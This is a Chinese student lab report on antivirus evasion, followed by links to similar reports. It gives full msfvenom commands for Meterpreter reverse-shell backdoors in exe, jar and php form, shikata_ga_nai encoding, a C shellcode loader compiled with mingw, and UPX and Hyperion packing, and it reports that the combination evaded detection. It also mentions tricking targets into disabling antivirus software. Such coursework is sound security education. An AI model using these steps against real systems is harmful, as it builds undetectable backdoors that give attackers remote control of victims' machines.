2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践
- 实验内容
- 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
- 使用msf编码器生成各种后门程序及检测
- 使用veil-evasion生成后门程序及检测
- 任务二:通过组合应用各种技术实现恶意代码免杀
- 任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本
- 任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
基础问题回答
- (1)杀软是如何检测出恶意代码的?
检测代码是否含有特征码;检测代码的行为是不是和恶意代码相同;启发式恶意代码检测。 - (2)免杀是做什么?
防止恶意代码被安全软件检测、识别。 - (3)免杀的基本方法有哪些?
改变特征码
- 只有EXE——加壳(压缩壳 加密壳)
- 有shellcode——利用encode进行编码
- 有源代码——用其他语言进行重写再编译- 改变行为
- 通讯方式
- 尽量使用反弹式连接
- 使用隧道技
- 加密通讯数据
- 通讯方式
- 操作模式
- 基于内存操作
- 减少对系统的修改
- 加入混淆作用的正常功能代码 非常规方法
- 使用一个有漏洞的应用当成后门,编写攻击代码集成到如MSF中。
- 使用社工类攻击,诱骗目标关闭AV软件。
- 纯手工打造一个恶意软件
- (1)杀软是如何检测出恶意代码的?
实验内容
任务一:正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧
用VirusTotal扫描后结果如下
用Virscan网站的扫描结果如下
不加任何处理的后门程序能够被大多数杀软检测到,下面我们用msf编码器对后门程序进行一次到多次的编码,并进行检测。
- 一次编码使用命令:-e选择编码器,-b是payload中需要去除的字符,该命令中为了使'\x00'不出现在shellcode中,因为shellcode以'\x00'为结束符
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b '\x00' LHOST=192.168.216.130 LPORT=5301 -f exe > ctfbackdoor.exe
- 扫描结果
- 十次编码使用命令:
-i
设置迭代次数
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.216.130 LPORT=5301 -f exe > ctfbackdoor10.exe
- 扫描结果
由此可见,多次编码对免杀没有太大的效果
msfvenom生成jar文件
生成java后门程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.216.130 LPORT=5301 x> ctf_backdoor_java.jar
扫描结果
msfvenom生成php文件
- 生成PHP后门程序使用命令:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.216.130 LPORT=5301 x> 20165301_backdoor.php
- 扫描结果
使用veil-evasion生成后门程序及检测
- 安装veil
mkdir -p ~/.cache/wine
cd ~/.cache/wine
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86.msi
wget http://dl.winehq.org/wine/wine-gecko/2.47/wine_gecko-2.47-x86_64.msi
sudo apt-get install veil-evasion
半手工注入Shellcode并执行
使用命令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.216.130 LPORT=5301 -f c
用c语言生成一段shellcode
- 创建一个文件20165301.c,然后将unsigned char buf[]赋值到其中,代码如下:
unsigned char buf[] =
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
此处省略
"\xc3\xbb\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";int main()
{int (*func)() = (int(*)())buf;func();
}
使用命令
i686-w64-mingw32-g++ 20165301.c -o 20165301.exe
编译这个.c文件为可执行文件.exe
检测结果
加壳
在技术上分壳分为:
- 压缩壳
- 减少应用体积,如ASPack,UPX
- 加密壳
- 版权保护,反跟踪。如ASProtect,Armadillo
- 虚拟机
- 通过类似编译手段,将应用指令转换为自己设计的指令集。如VMProtect,Themida
- 使用压缩壳(UPX)
- 给20165301.exe加个壳
- 查看连接情况,可以反弹连接
- 检测结果
- 给20165301.exe加个壳
- 加密壳Hyperion
- 将上一个生成的文件拷贝到
/usr/share/windows-binaries/hyperion/
目录中 - 进入目录
/usr/share/windows-binaries/hyperion/
中 - 输入命令
wine hyperion.exe -v ctf.exe ctf_upxed_Hyperion.exe
进行加壳
- 将上一个生成的文件拷贝到
生成新的可执行文件
反弹连接
检测结果
任务二:通过组合应用各种技术实现恶意代码免杀
- 通过组合半手工制作shellcode,压缩壳,加密壳达到了免杀的目的
- 任务成功截图:
- 实验遇到的问题
veil安装过程遇到很大困难,有时候生成的壳无法打开。经过反复尝试,最终解决。
转载于:https://www.cnblogs.com/CTF5301/p/10633621.html
2018-2019-2 网络对抗技术 20165301 Exp3 免杀原理与实践相关推荐
- 2018-2019-2 20165315 《网络对抗技术》Exp3 免杀原理与实践
2018-2019-2 20165315 <网络对抗技术>Exp3 免杀原理与实践 一.实验内容 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp3 免杀原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp3 免杀原理与实践 目录 0. 基础知识 1. 实验内容 1.1 方法 1.1.1 正确使用msf编码器 1.1.2 ...
- 20165214 2018-2019-2 《网络对抗技术》Exp3 免杀原理与实践 Week5
<网络对抗技术>Exp3 免杀原理与实践 Week5 一.实验内容 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shell ...
- 2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践
2018-2019-2 网络对抗技术 20165210 Exp3 免杀原理与实践 免杀的概述 免杀,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-Ant ...
- 20165223《网络对抗技术》Exp3 免杀原理与实践
目录 -- 免杀原理与实践 免杀原理与实践 本次实验任务 基础知识问答 免杀扫描引擎 实验内容 正确使用msf编码器,msfvenom生成jar等文件,veil-evasion,加壳工具,使用shel ...
- 2018-2019-2 网络对抗技术 20165303 Exp3 免杀原理与实践
实验内容 一. 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分) ...
- 20164317《网络对抗技术》Exp3 免杀原理与实践
一.实验要求 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程( ...
- 2018-2019-2 网络对抗技术 20165335 Exp3 免杀原理与实践
一.免杀原理与基础知识: (1)杀软是如何检测出恶意代码的? 检测特征码:特征码就是一般程序都不会有的代码,而后门有的那种特别的数据,而一个程序,应用有这种代码,数据的话,就直接判定为恶意代码. 主流 ...
- 2018-2019-2 网络对抗技术 20165231 Exp3 免杀原理与实践
实践内容(3.5分) 1.1 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcod ...
最新文章
- 2022-2028年中国钢铁电商产业竞争现状及发展前景预测报告
- 阿里带火的中台到底是什么?白话中台战略
- Archlinux里面安装VMware Tools
- 每天睡4小时上7门课
- C++笔记-QSslSocket::supportsSsl返回false(windows版的Qt不支持SSL)解决
- Apple Watch用户终于能对部分预装应用说不了 包括闹钟、定时器等
- SWT学生成绩管理系统
- Python英语单词查询
- centos php mbstring.so,CentOS安装php mbstring的扩展
- PHP 微信网页授权开发
- 面试题,谈谈一款APP的优缺点,并提出改进建议
- 内存碎片与malloc(转)
- 第二课 Python Web企业门户网站-框架搭建
- 发送、抄送、密送、分别发送、回复、回复全部、转发的区别(一篇文章研究透彻)
- python flask 微信_使用Flask创建微信公众号
- 概念:ASP是一种语言么?
- ppt关闭受保护视图
- 2022年危险化学品经营单位主要负责人最新解析及危险化学品经营单位主要负责人考试资料
- 商业智慧——三国职场人
- 2022华为开发者大赛 首届·厦门开发者创新应用赛在厦门举办
热门文章
- OSINT系列:威胁信息挖掘ThreatMiner
- hdu 1544(求回文子串的个数)
- TCP滑动窗口 - 动画演示
- hadoop 023.0与hadoop 1.0 io.serializable分析
- 透视WPF 应用程序的利器
- [图示]话剧《被结婚时代》将剩女分4级
- 吵架后一个老公的检讨书(超经典)
- mysql innodb 1017_MySQL InnoDB表压缩
- 4.3.6 无分类编址CIDR
- Notepad++编写的Verilog文件导入Vivado,中文注释乱码问题